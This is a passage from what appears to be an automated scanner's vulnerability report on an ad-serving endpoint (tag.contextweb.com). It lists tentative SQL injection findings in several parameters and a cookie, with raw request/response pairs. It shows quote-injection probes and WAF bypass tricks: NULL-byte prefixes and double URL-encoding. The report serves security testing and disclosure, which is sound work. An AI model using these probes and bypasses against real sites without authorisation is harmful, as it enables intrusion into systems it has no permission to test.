Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:49 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=484; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app209_0s7g5vuuP87p%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...

Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/106
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:50 GMT
Content-Length: 1708
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222270352; Domain=.contextweb.com; Path=/
Set-Cookie: vf=485; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid ...[SNIP]...
1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://tag.contextweb.com |
| Path: | /TagPublish/GetAd.aspx |
Issue detail
The epid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the epid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00'&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:46 GMT
Content-Length: 2041
Connection: close
Set-Cookie: vf=802; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_N4UEGwHAZheP%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...

Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00''&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:47 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224067319; Domain=.contextweb.com; Path=/
Set-Cookie: vf=803; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20% ...[SNIP]...
1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://tag.contextweb.com |
| Path: | /TagPublish/GetAd.aspx |
Issue detail
The esid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid='&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2041
Date: Sat, 17 Sep 2011 01:47:50 GMT
Connection: close
Set-Cookie: vf=806; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app208_1c4prRRFRDCJ%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...

Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=''&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:51 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224071201; Domain=.contextweb.com; Path=/
Set-Cookie: vf=807; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20% ...[SNIP]...
1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://tag.contextweb.com |
| Path: | /TagPublish/GetAd.aspx |
Issue detail
The pb_rtb_ev cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pb_rtb_ev cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pb_rtb_ev cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:19:16 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=592; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app203_AjrHJFvs9xWj%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...

Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2372
Date: Sat, 17 Sep 2011 01:19:17 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222357255; Domain=.contextweb.com; Path=/
Set-Cookie: vf=593; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid ...[SNIP]...
1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://tag.contextweb.com |
| Path: | /TagPublish/GetAd.aspx |
Issue detail
The pxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pxy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
Response 1
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP204 Cache-Control: private, max-age=0, no-cache, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT CW-Loop: 13 CWDL: 13/123 Content-Type: application/x-javascript;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 01:18:39 GMT Content-Length: 2074 Connection: close Set-Cookie: vf=529; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_3NkTLnCH1peq%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht ...[SNIP]...
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
Response 2
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: CW-APP205 Cache-Control: private, max-age=0, no-cache, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT CWDL: 12/101 Content-Type: application/x-javascript;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 17 Sep 2011 01:18:39 GMT Content-Length: 1846 Connection: close Set-Cookie: 538518_3_106142_-1=1316222319958; Domain=.contextweb.com; Path=/ Set-Cookie: vf=530; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
